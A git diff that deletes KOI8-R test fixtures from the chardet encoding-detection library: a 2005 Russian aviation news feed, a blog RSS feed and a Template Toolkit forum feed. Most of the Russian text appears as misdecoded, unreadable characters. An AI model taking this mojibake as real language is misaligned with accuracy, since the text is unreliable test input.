ֲִֵֹֿ־ֵ־ֹֹ (קבףן) ֹ 5 ׃ֱֵּֽֿװֿ׳ ׃ֵֵֽ׃װ׳ֱ פױ-204 ־ֱ ןבן "ב׳ֱֹ׃װֱׂ" (ץּ״ׁ־ֿ׳׃ֻ). ק ־ֱ׃װֹֿׁ ֵֽֽֿ־װ יזכ ֶֹֽֿׂׂױֵװ ׀ֱֵֻװ ׃װֱׂװֿ׳ַֿֿ ֱֱֱֻ ֿׂ׃׃ֹ׃ֻֿ-ױֱֹֻׂ־׃ָֹֻ ׃ֱֵּֽֿװֿ׳ ׃ֵֵֽ׃װ׳ֱ ב־-148, ׃ֵֹׂ־ֵֿ ׀ֹֿׂ׳ִֿ׃װ׳ֿ ֻֿװָֿׂ ׳ 2005 ִַֿױ ־ֱֱּײֵ־ֿ ־ֱ קבףן ֹ כֹחבת "ב׳ֱֹ־װ" (כֵֹ׳). נֿ ׃ֿ׃װֿׁ־ְֹ ־ֱ 1 ֻֿװֲׁׁׂ 2005 ֱִַֿ ׃װֹֽֿֿ׃װ״ ֱֻװֹ׳ֿ׳ יזכ ֳֵֿ־ֹ׳ֱֵװ׃ׁ ׳ 12,386 ִּֽׂ ׂױֲֵּ ($427 ּֽ־). כֽֿ׀ֱ־ֹׁ ֻֿ־װֹּֿׂׂױֵװ׃ׁ ַֿ׃ױֱִׂ׃װ׳ֽֿ (38% ֱֳֹֻ ױ עֿ׃ֹֽױֵ׃װ׳ֱ ֹ ֻּֿֿֿ 16% - ׳ ׃ֲֿ׃װ׳ֵ־־ֿ׃װֹ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ק־ֵֻֿ־ֱֲֽֿ־ֱֻ). וֵ 36% ֱׂ׃׀ֿׁׂײֱֵװ׃ׁ מֱֳֹֿ־ֱּ״־ֱׁ ֵֵׂׂ׳־ֱׁ ֻֿׂ׀ֱֳֹֿׁׂ, ֵֽ־ִֵײֵֽ־װ ֻֿ־װֹּֿׂׂױֵװ 7% ֱֳֹֻ. - - - - - טֱׂ״ֻֿ׳׃ֵֻֿ ֱ׳ֱֹ׃װֹֿׂװֵּ״־ֵֿ ׀ִֵׂ׀ֹׁׂװֵֹ ַֿװֿ׳ֿ ױֱִֹּװ״ ֻֿ־ֶֹֻּװ ׃ במפכ "ב־װֿ־ֿ׳" - http://www.aviaport.ru/news/2005/12/29/99251.html - טחבננ ַֿװֿ׳ֿ ׀ִֵּֿׂײֹװ״ במפכ "ב־װֿ־ֿ׳" ֹֽֿׂ׳ױְ. ןֲ װֽֿ ֵֻֿׂׂ׃׀ֿ־ִֵ־װױ לІחבגі־ֵ׃І־ֶֽֿׂ ׳ ֻ׃ְֹֻּ׳־ֽֿ ֹ־װֵׂ׳״ְ ׃ֲֹּֿֿ ִֵֹֻׂװֿׂ ׀ִֵׂ׃װֱ׳ֹװֵּ״׃װ׳ֱ טחבננ ׳ כֵֹ׳ֵ ה. םֵּ״־ֹֻ - Thu, 29 Dec 2005 14:35:00 +0300 - טֱׂ״ֻֿ׳׃ֵֻֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ֵֿ ֱ׳ֱֳֹֹֿ־־ֵֿ ׀ֹֿׂ׳ִֿ׃װ׳ֵ־־ֵֿ ׀ִֵׂ׀ֹׁׂװֵֹ (טחבננ) ַֿװֿ׳ֿ ׀ִֵּֿׂײֹװ״ במפכ "ב־װֿ־ֿ׳" ֹֽֿׂ׳ױְ. ןֲ װֽֿ ֵֻֿׂׂ׃׀ֿ־ִֵ־װױ לІחבגі־ֵ׃І־ֶֽֿׂ ׳ ֻ׃ְֹֻּ׳־ֽֿ ֹ־װֵׂ׳״ְ ׃ֲֹּֿֿ ִֵֹֻׂװֿׂ ׀ִֵׂ׃װֱ׳ֹװֵּ״׃װ׳ֱ טחבננ ׳ כֵֹ׳ֵ הֹֽװֹׂ םֵּ״־ֹֻ.נֿ ֵַֿ ׃ּֿ׳ֱֽ, ֹ־ֱֱּ״־ֿ ׳ ׃ױִ ׀ֱִּֿ במפכ "ב־װֿ־ֿ׳" ׃ ֹ׃ֻֽֿ ־ֱ ׳ֵֵֽֿ־ֵֹ ֱּֽֿׂ״־ַֿֿ ױֱֲֵׂ ׳ ֱֵֵֽׂׂ 90 ּֽ־.ַׂ־. "ף װַֿֿ ֵֽֽֿ־װֱ ־ֱֱֹּ׃״ ׀ֳֵֿׂ׃׃, ֹ׃ֹֻ, ֱֲֹׂװֱׂײ־ֵ ׃ױִ... מֱ ׃ִֵַֿ־ׁ־ֹ ֵֽֽֿ־װ טֱׂ״ֻֿ׳׃ֹֻ ֱ׳ֱֱֹ׳ִֿ ַֿװֿ׳ ׃ֵ׃װ״ ֱ ׃װּֿ ׀ֵֵַֿׂ׳ֿֿׂ׳ ֹ ׀ִֵּֿׂײֹװ״ ֹֽֿׂ׳ױְ", - ֿװֵֽװֹּ ה.םֵּ״־ֹֻ.ק װֿ ײֵ ׳ֵֽׁׂ ֿ־ ֿװֵֽװֹּ, װֿ ־ֵֽ־ַֿֿ ֱׂ־ֵֵ "ֹֽֿׂ׳ֵֿ ׃ֱֵַּֿ־ֵֹ" ֵֽײִױ ׀ִֵׂ׀ֹׁׂװֹֹֽׁ ֲּֿ ִֿ׃װַֹ־ױװֿ, ־ֿ ׀ֿ׃ֵּ "ֹֽֿׂ׳ֿ" במפכ ׀ֱִּֿ ־ֱ טחבננ ִֵֵֿׂ־ֿ ֹ׃ֻ. "פֱֹֻֽ ֱֲֽֿֿׂ ֵֻֽֽֿ־װֹֿׂ׳ֱװ״ װֿ ׃ֲֿװֵֹ ֽ־ֵ ִֿ׳ּֿ״־ֿ ֱװׂױִ־ֹװֵּ״־ֿ - ׃׀ֿׂ׃ֹװֵ ױ ־ָֹ. ‏װֿ ײֵ ֱֻ׃ֱֵװ׃ׁ ׀ֳֹֹֹֿ טֱׂ״ֻֿ׳׃ַֻֿֿ ֱ׳ֱֱֹ׳ֱִֿ.... ו׃ֹּ ־ֱֽ ׳ִ׳ְֱַֹװ ֹ׃ֹֻ, ׃ ֻֿװֹֽֿׂ ֽ ־ֵ ׃ֱַּֿ׃־, װֿ ֽ ׳ִ׳ֱֵַֹֽ ׳׃װֵׂ־ֵ ֹ׃ֹֻ", - ׃ֲֹּֿֿ ה.םֵּ״־ֹֻ.מֱ׀ֽֿ־ֹֽ, ׃ױֲִֵ־ֵ ֱֱֲֹׂׂװֵּ״׃װ׳ֱ ֵֽײִױ במפכ ֹ טחבננ ִּׁװ׃ׁ ױײֵ ֲֵֵּֿ ׀ּֿױֱִַֿ. נֿ׃ִֵּ־ֹֽ ֵֵׂ־ֵֹֽ ׀ֿ ֱִ־־ֽֿױ ׳ֿ׀ֿׂ׃ױ ׁ׳ֵּׁװ׃ׁ ֵֵׂ־ֵֹ כֵֹ׳׃ַֻֿֿ ֱ׀ֳֵֹּּֿׁ־־ַֿֿ ָֿׁ׃װ׳ֵ־־ַֿֿ ׃ױֱִ, ֻֿװֿׂ 9 ֱֲִֵֻׁׂ 2005 ֱִַֿ ֿ׃װֱ׳ֹּ ֲֵ ױִֿ׳ֵּװ׳ֵֿׂ־ֹׁ ֱ׀ֳֵֹּּֿׁ־־ױְ ײֱֲּֿױ במפכ "ב־װֿ־ֿ׳" ־ֱ ֵֵׂ־ֵֹ טֿׁ׃װ׳ֵ־־ַֿֿ ׃ױֱִ ֱִַֿֿׂ כֵֹ׳ֱ ֿװ 19 ׃ֵ־װֲׁׁׂ 2005 ֱִַֿ, ֻֿװֽֿׂ ֻֽֿ׀ֱ־ֹֹ ֲּֿ ֿװֱֱֻ־ֿ ׳ ױִֿ׳ֵּװ׳ֵֿׂ־ֹֹ ֹ׃ֱֻ ֻ טחבננ ־ֱ ׃ױֽֽױ 61,15 ּֽ־. ַׂ־. - - - - - ףֿװׂױִ־ֹֹֻ ׃ּױײֲ ֱ׳ֱֳֹֹֿ־־ֿ ֲֵֿ׀ֱ׃־ֿ׃װֹ ֱֿׂ׀ֿׂװֱ פֱֵּֽֿ׳ֿ ֹֹּׁ ױ ֻױׂ׃ֱ־װֱ ןֽ׃ַֻֿֿ ֹ־ײֵ־ֵׂ־ֿ-װֱ־ֻֿ׳ַֿֿ ֹ־׃װֹװױװֱ ֹֽ־ױ - http://www.aviaport.ru/news/2005/12/29/99250.html - ק ֱֿׂ׀ֿׂװױ "פֱֵּֽֿ׳ֿ" ׀ֹׂ ׀ָֿֿׂײִֵ־ֹֹ ׀ִֵׂ׀ֵּֿװ־ַֿֿ ִֿ׃ֽֿװֱׂ ־ֱ ֵׂ׃ מֿ׳ֿ׃ֲֹֹׂ׃ֻ - םֹׂ־ ױ ׀ֱ׃׃ֱײֱֹׂ ֲֿ־ֱׂױײֵ־ֱ ֹֽ־ֱ - Thu, 29 Dec 2005 14:32:00 +0300 - 28 ֱֲִֵֻׁׂ ׳ 15.25 ֵֽ׃װ־ַֿֿ ׳ֵֵֽׂ־ֹ ֻױׂ׃ֱ־װ 3 ֻױׂ׃ֱ בֵֻּ׃ֱ־ִׂ הֻֿׁ׳ ֲּ ֱִֵׂײֱ־ ֹ־׃׀ֵֻװֽֿֿׂ ׃ּױײֲ ֱ׳ֱֳֹֹֿ־־ֿ ֲֵֿ׀ֱ׃־ֿ׃װֹ ׀ֹׂ ׀ָֿֿׂײִֵ־ֹֹ ׀ִֵׂ׀ֵּֿװ־ַֿֿ ִֿ׃ֽֿװֱׂ ־ֱ ֵׂ׃ מֿ׳ֿ׃ֲֹֹׂ׃ֻ - םֹׂ־.םֹ־ֱ ֱֱֱֻּֿ׃״ ױֲֵ־ֿ. ףֿװׂױִ־ֱֹֹֻֽ ֹּ־ֵ־ַֿֿ ֿװֱִֵּ ֳֹֹֹֹּֽ ֱֿׂ׀ֿׂװֱ ׃ֿ׃װֱ׳ֵּ־ ׀ֿׂװֻּֿֿ, ֱֵֻֽװ ֹֽ־ ֹׁװ, ׃װױִֵ־װ ֿװ׀ֱׂ׳ֵּ־ ׀ֿ ֵֽ׃װױ ײֹװֵּ״׃װ׳ֱ ׳ ׀ֿ׃ֵֻּֿ נִֵֵּױ ֵׂ׃׀ױֲֹֹֻּ ףֱֱָ.נֿ ׃ּֿ׳ֱֽ, ֱִֵׂײֱ־־ַֿֿ, ֱֵֻֽװ ֹֽ־ ֿ׃װֱּ׃ׁ ױ ־ֵַֿ ׳ ׃ױֵֻֽ ׀ֿ׃ֵּ ױֵ־ֹ. ב ֿװֲ׳ ׳ ֿװ׀ױ׃ֻ ֿ־ ׀ֿׂ׃װֿ ־ֵ ׀ֿׂ׳ֵֹּׂ ׃ִֵֿׂײֵֹֽֿ ׃ױֹֻֽ.P.S. מֵ׃ֽֿװׁׂ ־ֱ ֵֿ־״ ֱֵּֽ־״ֵֹֻ ֱֵֽׂׂ (ֵֽװֱֵֹּּ׃ֱֻׁ ֱ׃װ״ ׀ִֵׂ׃װֱ׳ֵּׁװ ׃ֲֿֿ ׀ּֿױְ װׂױֲֻױ ֱִֵֹֽװֽֿׂ ׳׃ֵַֿ 6 ֽֽ ֹ ִֹּ־ֿ 2,5 ׃ֽ.), ֹֽ־ֱ ֱֲּ ֲֿ־ֱׂױײֵ־ֱ ׳ ׀ֳֵֿׂ׃׃ֵ ִֿ׃ֽֿװֱׂ ־ֱ ֵׂ־װֵַ־ֿ-װֵֵּ׳ֹֹֿ־־ֿ ױ׃װֱ־ֿ׳ֵֻ "HEIMANN". - - - - - AZAL ׀ּֿױֹװ ֲֵֵּֿ $8 ּֽ־. ׃װֱָֿׂ׳ָ ׳׀ֱּװ ֱ ׀ֿװֵׂ׀ֵ׳ֹ ֻׂױֵ־ֵֹ ׃ֱֵּֽֿװ ב־-140-100 - http://www.aviaport.ru/news/2005/12/29/99249.html - ק ׃ֿֿװ׳ֵװ׃װ׳ֹֹ ׃ֿ ׃װֱָֿׂ׳ֽ ׀ֹּֿ׃ֽֿ ֱ ׀ֿװֵׂ׀ֵ׳ֹ ֱֻװֱ׃װֶֿׂױ ֲֹּ גֱֻױ ׃ֱֵּֽֿװ ב־-140-100 ׀ֹֿׂ׳ִֿ׃װ׳ֱ טחבננ AZAL ׀ּֿױֹװ $8,5 ּֽ־. - Thu, 29 Dec 2005 14:20:00 +0300 - ק ׃ֿֿװ׳ֵװ׃װ׳ֹֹ ׃ֿ ׃װֱָֿׂ׳ֽ ׀ֹּֿ׃ֽֿ ֱ ׀ֿװֵׂ׀ֵ׳ֹ ֱֻװֱ׃װֶֿׂױ ֲֹּ גֱֻױ 23 ֱֲִֵֻׁׂ ׃ֱֵּֽֿװ ב־-140-100 ׀ֹֿׂ׳ִֿ׃װ׳ֱ טֱׂ״ֻֿ׳׃ַֻֿֿ ַֿ׃ױֱִׂ׃װ׳ֵ־־ַֿֿ ֱ׳ֱֳֹֹֿ־־ַֿֿ ׀ִֵׂ׀ֹׁׂװֹׁ חכ AZAL ׀ּֿױֹװ $8,5 ּֽ־. ןֲ װֽֿ, ֱֻֻ ׀ֱִֵֵֵׂװ "פֵׂ־ִ", ׃ֲֹּֿֿ 28 ֱֲִֵֻׁׂ ־ֱ ׀ֵׂ׃׃-ֻֿ־ֵֵֶׂ־ֳֹֹ ֱַּ׳ֱ חכ AZAL הײֱֱָ־ַֹׂ ב׃ֵֻֿׂ׳.נֿ ֵַֿ ׃ּֿ׳ֱֽ, ֱֻײֱִׁ ׃ֵֽ״ׁ ׀ֲַָֹֹֿ ׀ֱ׃׃ֱײֹֿׂ׳ ׀ּֿױֹװ ׀ֿ 115 ּֽ־ ֱֽ־ֱװֿ׳, ֹֹּ $25 װ׃. "נֹֽֽֿֿ װַֿֿ, ׳ ׃׳ֹׁ ׃ ׀ֿװֵֵׂ ֹֻּֽֿׂ״ֱֳ, ׳ ֱ׃װ־ֿ׃װֹ, ֵ׃ֹּ ױ ׀ֲַָֹֹֿ ׀ֱ׃׃ֱײֹֿׂ׳ ֲֹּ ־ֵ׃ֿ׳ֵֵׂ־־ֵּֿװ־ֵֹ ִֵװֹ, ֽ ֲױִֵװ ֹֽ ׳׀ֱֹּ׳ֱװ״ ׃ִֵׂ׃װ׳ֱ ׳ ֱֵֵֽׂׂ ׃ִֵׂ־ֵ ֱֱֲֿׂװ־ֿ ׀ֱּװ ־ֱ ֱֻײִַֿֿ ֲֵֵׂ־ֱֻ",- ׃ֱֱֻּ ֿ־.הײ. ב׃ֵֻֿׂ׳ ֿװֵֽװֹּ, װֿ ׳׀ֱּװ ֻֽֿ׀ֵ־׃ֱֳֹ ַֽֿױװ ֲװ״ ־ֱֱװ ׃ ֵֶ׳ֱּׁׂ 2006 ֱִַֿ. חֱּ׳ֱ חכ װֱֻײֵ ֿװֵֽװֹּ, װֿ ֱֻײֱִׁ ׃ֵֽ״ׁ ֵּ־ֿ׳ ֹֻ׀ֱײֱ ׀ּֿױֹװ $10 װ׃. ׳ ֱֵֻ׃װ׳ֵ ֱ׳ֱֳֹֹֿ־־ֿ ׃װֱָֿׂ׳ֹֻ. - - - - - - \ No newline at end of file diff --git a/chardet/tests/KOI8-R/blog.mlmaster.com.xml b/chardet/tests/KOI8-R/blog.mlmaster.com.xml deleted file mode 100644 index 05f6a2c..0000000 --- a/chardet/tests/KOI8-R/blog.mlmaster.com.xml +++ /dev/null @@ -1,174 +0,0 @@ - - - - - - - chub@tosy - http://blog.mlmaster.com - love & peace ! - Wed, 28 Dec 2005 08:53:15 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ף מח! - http://blog.mlmaster.com/?p=296 - http://blog.mlmaster.com/?p=296#comments - Wed, 28 Dec 2005 08:53:15 +0000 - danil - - General - http://blog.mlmaster.com/?p=296 - - http://blog.mlmaster.com/?feed=rss2&p=296 - - - נִַֿֿװֿ׳ֱֻ ֻ ְְֲֵֹּ - http://blog.mlmaster.com/?p=295 - http://blog.mlmaster.com/?p=295#comments - Wed, 21 Dec 2005 19:43:43 +0000 - site admin - - General - http://blog.mlmaster.com/?p=295 - - http://blog.mlmaster.com/?feed=rss2&p=295 - - - מֱֹ ֵֹּֽ ֱֱַׂ־ֹ־ֵ ִׂױ״ׁ - http://blog.mlmaster.com/?p=294 - http://blog.mlmaster.com/?p=294#comments - Fri, 16 Dec 2005 09:19:20 +0000 - danil - - General - http://blog.mlmaster.com/?p=294 - - http://blog.mlmaster.com/?feed=rss2&p=294 - - - ףֱּ׳ֵ־, ־ױײ־ֱ ׃׳ׁ״. - http://blog.mlmaster.com/?p=293 - http://blog.mlmaster.com/?p=293#comments - Wed, 14 Dec 2005 14:36:19 +0000 - RuAnShi - - General - http://blog.mlmaster.com/?p=293 - - http://blog.mlmaster.com/?feed=rss2&p=293 - - - ב ֻֽֿױ ֵֶ׃װֹ׳ֱֵּ - http://blog.mlmaster.com/?p=292 - http://blog.mlmaster.com/?p=292#comments - Tue, 06 Dec 2005 16:21:26 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=292 - - http://blog.mlmaster.com/?feed=rss2&p=292 - - - Exit the movie - http://blog.mlmaster.com/?p=291 - http://blog.mlmaster.com/?p=291#comments - Mon, 05 Dec 2005 18:01:09 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=291 - - http://blog.mlmaster.com/?feed=rss2&p=291 - - - מֹװֻׁ - http://blog.mlmaster.com/?p=289 - http://blog.mlmaster.com/?p=289#comments - Mon, 05 Dec 2005 14:37:11 +0000 - danil - - General - http://blog.mlmaster.com/?p=289 - - http://blog.mlmaster.com/?feed=rss2&p=289 - - - בֹּ׃ֱ - http://blog.mlmaster.com/?p=288 - http://blog.mlmaster.com/?p=288#comments - Tue, 29 Nov 2005 08:58:22 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=288 - - http://blog.mlmaster.com/?feed=rss2&p=288 - - - קֱֱֵֶּֽֿֿׂ־ - http://blog.mlmaster.com/?p=287 - http://blog.mlmaster.com/?p=287#comments - Tue, 29 Nov 2005 08:55:52 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=287 - - http://blog.mlmaster.com/?feed=rss2&p=287 - - - כֵּֿ׃ֱ - http://blog.mlmaster.com/?p=286 - http://blog.mlmaster.com/?p=286#comments - Tue, 29 Nov 2005 08:52:59 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=286 - - http://blog.mlmaster.com/?feed=rss2&p=286 - - - diff --git a/chardet/tests/KOI8-R/forum.template-toolkit.ru.1.xml b/chardet/tests/KOI8-R/forum.template-toolkit.ru.1.xml deleted file mode 100644 index 7d0a02f..0000000 --- a/chardet/tests/KOI8-R/forum.template-toolkit.ru.1.xml +++ /dev/null @@ -1,428 +0,0 @@ - - - - - זֿׂױֽ Template Toolkit : עֱֲֿװֱ ׃ Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-1.html?rss - Template Toolkit - ֲ׃װֱׁׂ, ֽֿ־ֱׁ ֹ ֱׂ׃ֱֵֹֽׁׁׂ ׃ֹ׃װֱֵֽ ֱֲֲֿֿׂװֹֻ ֱֲּֿ־ֿ׳. מֱ ׃ֱװֵ ֱֲֿׂװֱֵװ ֶֿׂױֽ, ׳ ֻֿװֽֿֿׂ ֲֿ׃ױײְֱִװ׃ׁ ׳ֿ׀ֿׂ׃ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ ֲֲֹֹּֿװֵֹֻ ׀ֿ ֱֲֿׂװֵ ׃ ֱֲּֿ־ֱֹֽ. ת־ֱֻֽֿ׃װ׳ֿ ׃ Template Toolkit. קֽֿֿײ־ֿ׃װֹ ֲֲֹֹּֿװֵֹֻ, ׀ֵֹֽׂ ֹ׃׀ּֿ״ֿ׳ֱ־ֹׁ. נֲֵּֽֿׂ ֹ ָֹ ֵֵׂ־ֵֹ. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 12 Dec 2005 10:09:35 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ֱֲּֿ־ ׳ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - Wed, 7 Dec 2005 11:19:46 GMT - Template::Plugin::XML::RSS - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - ׀ֹׂ ֹ׃׀ּֿ״ֿ׳ֱ־ֹֹ Template::Plugin::XML::RSS ׳ֵ׃״ ׳׳ִֿ ֹ ִ׳ֹײֱֻ Template ׃ֱׂױ ־ֱֹ־ֱֵװ ֱִֵּװ״׃ׁ ׳ UTF-8. ֱֲ׃ְּֿװ־ֿ ׳ֵ׃״. פױװ ֶֿׂױֽ ׳ִֵֿׂ ֱֻֻ ׳ RSS ֱִ־־ֵ ֱׂ־ֹװ ֹ ִֹֻֿֿׂ׳ֱֻ koi-8-r ֱֲֿׂװֱֵװ.<br /> -׀ֹׂ װֽֿ ׳׃ֵ ׀ֿ׀װֹֻ ׀ֱִֵֵׂװ״ ׳ ֻֿ־׃װֻׂױװֿׂ XML::RSS-&gt;new (encode =&gt; 'ֽֿׁ_ִֹֻֿֿׂ׳ֱֻ') ::RSS-&gt;new ( output =&gt; 'ֽֿׁ_ִֹֻֿֿׂ׳ֱֻ') ־ֵ ׀ֱֻֿׂװ׳ֱֵװ :-(<br /> -ֹױֵ־ֵֹ ֵׂױּ״װֱװֱ ׀ֹׂ DEBUG_ALL ־ֹ ֻ ֵֽױ ־ֵ ׀ֹׂ׳ֵֹּ. ׳ װֱׂ׃׃ֹֿׂ׳ֵֻ ֱֱֲִֵַ ׳׃ֵ ֱִ־־ֵ ִֹױװ ׳ ־ױײ־ֿ ֽ־ֵ ִֹֻֿֿׂ׳ֵֻ. .װ.ֵ. ֲֵ ׀ִֵֵֹֻֿֿׂׂ׳ֱ־ֹֹ ִ׳ֹײֻֽֿ TT2<br /> -<br /> -ֽֿײֵװ ִֵַ-װֿ װֿװ ׀ֱַֹּ־ ׀ֵֵֻׂׂ׳ֱֵװ TT2-־ $output ?<br /> -<br /> -׳ֿװ װֱֱֻׁ ֻֿ־׃װׂױֳֹֻׁ:<br /> -[% USE news = XML.RSS('forum_1.xml') %]<br /> -[% FOREACH item = news.items %]<br /> -&lt;pre&gt;<br /> - [% item.title %]<br /> -&lt;/pre&gt;<br /> -[% END %] - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-120.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - Thu, 1 Dec 2005 09:33:45 GMT - ה׳ֱ include-ֱֻװֱֱַּֿ - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - ץ ֵֽ־ׁ װֱֱֻׁ ׃ֹװױֱֳֹׁ. חׂױ׀׀ֱ ׃ֱװֿ׳ (װױֻ 10) ְֵֹֽװ ׀ֿװֹ ִֹֿ־ֱֻֿ׳ֵֿ ֵֶּֽֿֿׂ־ֵֹ. ףֱװ ׃ֱִֵּ־ ־ֱ TT2. ףֱֵ׃ ױ ֱֻײִַֿֿ ׃ֱװֱ ׃׳ֿ templates ֱֻװֱַּֿ.<br /> -מֿ ֽ־ֵַֹֿ ֱֶּ ִֹֿ־ֱֻֿ׳ (־ֵ ׳׃ֵ).<br /> -װֿ ־ֵ ֵֿ־״ ױֲִֿ־ֿ, ֲֿ־ֿ׳ּׁװ״ ׳ 10 ֵֽ׃װֱָ.<br /> -<br /> -כֱֻ ׃ֱִֵּװ״ ִ׳ֱ include ֱֻװֱֱַּֿ ױ TT װֲֿ ֿ־ ֹ׃ֱֻּ ׃־ֱֱֱּ ׳ ִֿ־ֽֿ ֱֻװֱֵַּֿ(־ֱ׀ֵֹֽׂׂ ֲֵֽֿ template), ֱ ֵ׃ֹּ ־ֵ ־ֱֵּ - ׳ ִׂױַֽֿ (ִּׁ ֱֻײִַֿֿ ֵֵ ֹ ױ־ֱֹֻּ״־ ֱֻװֱַּֿ template)? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-118.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - Thu, 17 Nov 2005 05:29:38 GMT - template Factory - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - נװְֱ׃״ ֱֵֹּֿׂ׳ֱװ״ ־ֵװֿ ֱ־ֱַֹּֿ־ֵֿ ֱֲּֿ־ױ Factory (ִֹֿ־ ֱַּ׳־ ֱֲּֿ־, ֹ ֽ־ַֿֿ ֱֲּֿ־ֿ׳ ׀ִֿׂױֻװֿ׳),<br /> -ףֿֿװ׳ֵװ׃װ׳ֵ־־ֿ ׀ֹׂ ־ֱ׀ֹ׃ֱ־ֹֹ ֱֲּֿ־ֿ׳-׀ִֿׂױֻװֿ׳ ֱֲֶֹֹֻׂ ָֿװֵּֿ׃״ ֲ ֿװ׃ֵּײֹ׳ֱװ״ ָֹ ׃׀ְֱֳֳֵֶֹֹֹֻ. ֱֻֻ ֹֽ־ֹֽױֽ ־ֱֵֹֹּ ֿ׀ִֵֵֵּׂ־־ָ ֲֻּֿֿ׳ BLOCK...END ֹ ֿ׀ִֵֵֵֵּׂ־־ָ ׀ֵֵֵֽׂ־־ָ. <br /> -פ.ֵ. ׀ִֵֵׂ ׳ְֵֻּ־ֵֹֽ ֱֲּֿ־ֱ (INCLUDE) ֱֹֻֻֽ-װֿ ֱֲֽֿֿׂ &quot;׀ַֿֿׂ־ׁװ״ ֵַֿ ־ֱ ׃ֿֿװ׳ֵװ׃׳ֵֹ ׃׀ֱֳֳֵֶֹֹֹֹֻ ֱֲֶֹֹֻׂ&quot;<br /> -נֻֿֿ׳ּׁׂ׃ׁ ׳ ֱֻּ׃׃-ִֽֿױֵּ Template::Context ־ֱֵּ װֱֽ ׀ֵֵֵֽׂ־־ױְ ֱֻּ׃׃ֱ BLKSTACK, ־ֿ ־ֵַֹֿ ׳־ׁװ־ַֿֿ ֹ ־ֵ£ ־ֵ ַֽֿױ ׳װֱֹװ״, װֹ׀ֱ:<br /> -foreach my $i ($template-&gt;service-&gt;context()-&gt;BLKSTACK) {<br /> -.....<br /> -} - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-117.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - Sun, 6 Nov 2005 18:33:25 GMT - כֱֻ ׀ִַֿׂױֹװ״ ִֽֿױּ״ ֱ׳װֱֽֿװֽֿ. - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - ֵ׃װ״ ׀ֱֲֵּֽֿׂ ׳ ֱֻײִֽֿ װֵֽ׀ֵּװֵ ׃ְֱִֿ ׃׳ֿ ׀ֱַֹּ־. ֱ ֵָֿװ׃ׁ ׃ֱִֿװ״ ֵַֿ ׀ֹׂ ׃ֱִֿ־ֹֹ Template <br /> -<br /> -׃ֱֵ׃ ׀ֿׂ׀ֹ׃ֱ־ֿ<br /> - PLUGINS=&gt;{<br /> - 'Atma'=&gt;'Atma::TPlugin'<br /> - },<br /> -ֹ ׳ ֱֻײִֽֿ װֵֽ׀ֵּװֵ ׀ֹױ <br /> -[% USE Atma(c) %]<br /> -[% Atma.myfunc(&quot;lalala&quot;)%]<br /> -<br /> -<br /> -ױ־ֱּ װֿ ֽֿײ־ֿ ֵַֿ ׀ֹֻׂׂױװֹװ״ ׃ ׀ֽֿֿ״ְ <br /> -ֹ ־ֵ ׀ֹ׃ֱװ״ USE Atma(c)<br /> -# LOAD_PLUGINS =&gt; Atma::TPlugin-&gt;new($self, $self),<br /> -־ֿ ־ֵ׀ֿ־ׁװ־ ֵַֿ ׀ֱֱֵֽׂװׂ ֹ װֿ-װֿ ׂױֱַּֿ׃״ װֿ ־ֵ־ֱִָֹֿװ ֶױ־ְֳֹֻ fetch, ׀ִֵֹּֿװֵ׃״ ֿ׀װֽֿ ֱֻֻ ־ױײ־ֿ װֿ ׃ֱִֵּװ״ ? - - Dmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-116.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - Tue, 1 Nov 2005 15:03:41 GMT - י ֵ£ ֱֻֻֿ ִ׳ֹײֻֿ ֶֿׂױֱֽ ֹ׃׀ּֿ״ױֵװֵ?? - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - ףֱֲײ:) - - ףִֵּֿ׀װ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-114.html - Template Toolkit - ֲֲֹֹּֿװֱֵֻ ִּׁ ֱֲֿׂװ ׃ ֱֲּֿ־ֱֹֽ ׳ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - Tue, 1 Nov 2005 15:02:06 GMT - לֱֱֳֹֹֻּֿׁ ׃ֱװֱ ׃ ׀ֽֿֿ״ְ TT - 